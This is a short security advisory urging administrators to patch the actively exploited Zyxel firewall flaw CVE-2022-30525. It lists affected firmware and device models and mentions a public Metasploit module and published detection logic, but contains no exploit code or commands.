How can we help?
Network administrators are being urged to patch Zyxel firewalls to address a critical vulnerability (CVE-2022-30525). The vulnerability has been seen under active exploitation and allows remote code execution (RCE) via an HTTP request of the devices.
An unauthenticated remote attacker can run commands on a firewall exposed to the internet.
A researcher, BlueNinja, has published detection logic for exploitation attempts on GitHub. This will produce a lot of noise if enabled for external-facing devices.
Firmware ZLD5.00 up to ZLD5.21 Patch 1 in the following devices:
- USG FLEX 100, 100W, 200, 500, 700
- USG20-VPN, USG20W-VPN
- ATP 100, 200, 500, 700, 800
The VPN series is not affected.
Containment, Mitigations & Remediations
Administrators are being urged to patch the critical flaw immediately.
Indicators of Compromise
This is under active exploitation and a Metasploit module has been released, making exploitation trivial. Zyxel firewalls are used mostly amongst small- to medium-sized enterprises primarily because of the features and price-point. More than 15,000 devices are potentially vulnerable.
T1190 – Exploit Public-Facing Application